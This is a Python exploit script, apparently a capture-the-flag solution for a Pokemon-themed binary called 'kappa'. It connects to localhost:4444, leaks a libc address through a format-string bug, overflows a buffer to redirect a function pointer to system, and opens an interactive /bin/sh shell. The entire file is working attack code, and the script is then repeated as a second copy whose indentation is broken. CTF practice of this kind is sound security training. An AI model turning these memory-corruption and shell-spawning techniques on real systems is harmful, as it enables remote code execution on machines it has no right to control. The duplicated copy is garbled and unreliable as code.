otms61/kappa.py

## kappa.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket, struct, telnetlib


def sock(remoteip, remoteport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    f = s.makefile('rw', bufsize=0)
    return s, f


def read_until(f, delim='\n'):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data


def p(a):
    return struct.pack("<I", a)


def u(a):
    return struct.unpack("<I", a)[0]


def shell(s):
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()

read_got = 0x804aeb4
printf_plt = 0x8048520
leak_libc_start_offset = 243
libc_start_offset = 0x19990
libc_system_offset = 0x40190

s, f = sock('localhost', 4444)
s.send('1\n1\n2\naaaaaaaaaaaaa\n')
s.send('1\n1\n2\naaaaaaaaaaaaa\n')
s.send('1\n1\n2\naaaaaaaaaaaab\n')
s.send('1\n1\n2\naaaaaaaaaaaaa\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n1\n1\n1\n2\n')
s.send('%23$xaaaaaaaa\n')
s.send('5\n')

s.send('5\n5\n')
payload = ''
payload += 'a'*513
payload += p(printf_plt)
payload += 'a'*(0x850-len(payload))
s.send(payload)
s.send('3\n')

read_until(f, 'aaaaaaaaaaaab')
read_until(f, 'aaaaaaaaaaaab')
read_until(f, 'aaaaaaaaaaaab')
read_until(f, 'Attack: Tackle\n')

leak_libc_start_addr = int(s.recv(8), 16)
libc_start_addr = leak_libc_start_addr - leak_libc_start_offset
libc_base = libc_start_addr - libc_start_offset
libc_system_addr = libc_base + libc_system_offset
print '[*] libc base: {}'.format(hex(libc_base))
print '[*] libc system: {}'.format(hex(libc_system_addr))

s.send('1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')
s.send('1\n1\n3\n')

s.send('1\n1\n1\n1\n1\n1\n2\n')
s.send('/bin/sh\x00aaaaa\n')
s.send('5\n')

s.send('5\n5\n')
payload = ''
payload += 'a'*513
payload += p(libc_system_addr)
payload += 'a'*(0x850-len(payload))
s.send(payload)
s.send('3\n')

print '[+] Shell'
shell(s)
	#!/usr/bin/python
	# -- coding: utf-8 --
	import socket, struct, telnetlib


	def sock(remoteip, remoteport):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((remoteip, remoteport))
	f = s.makefile('rw', bufsize=0)
	return s, f


	def read_until(f, delim='\n'):
	data = ''
	while not data.endswith(delim):
	data += f.read(1)
	return data


	def p(a):
	return struct.pack("<I", a)


	def u(a):
	return struct.unpack("<I", a)[0]


	def shell(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

	read_got = 0x804aeb4
	printf_plt = 0x8048520
	leak_libc_start_offset = 243
	libc_start_offset = 0x19990
	libc_system_offset = 0x40190

	s, f = sock('localhost', 4444)
	s.send('1\n1\n2\naaaaaaaaaaaaa\n')
	s.send('1\n1\n2\naaaaaaaaaaaaa\n')
	s.send('1\n1\n2\naaaaaaaaaaaab\n')
	s.send('1\n1\n2\naaaaaaaaaaaaa\n')
	s.send('1\n1\n3\n')
	s.send('1\n1\n3\n')
	s.send('1\n1\n1\n1\n1\n2\n')
	s.send('%23$xaaaaaaaa\n')
	s.send('5\n')

	s.send('5\n5\n')
	payload = ''
	payload += 'a'*513
	payload += p(printf_plt)
	payload += 'a'*(0x850-len(payload))
	s.send(payload)
	s.send('3\n')

	read_until(f, 'aaaaaaaaaaaab')
	read_until(f, 'aaaaaaaaaaaab')
	read_until(f, 'aaaaaaaaaaaab')
	read_until(f, 'Attack: Tackle\n')

	leak_libc_start_addr = int(s.recv(8), 16)
	libc_start_addr = leak_libc_start_addr - leak_libc_start_offset
	libc_base = libc_start_addr - libc_start_offset
	libc_system_addr = libc_base + libc_system_offset
	print '[*] libc base: {}'.format(hex(libc_base))
	print '[*] libc system: {}'.format(hex(libc_system_addr))

	s.send('1\n3\n')
	s.send('1\n1\n3\n')
	s.send('1\n1\n3\n')
	s.send('1\n1\n3\n')
	s.send('1\n1\n3\n')
	s.send('1\n1\n3\n')

	s.send('1\n1\n1\n1\n1\n1\n2\n')
	s.send('/bin/sh\x00aaaaa\n')
	s.send('5\n')

	s.send('5\n5\n')
	payload = ''
	payload += 'a'*513
	payload += p(libc_system_addr)
	payload += 'a'*(0x850-len(payload))
	s.send(payload)
	s.send('3\n')

	print '[+] Shell'
	shell(s)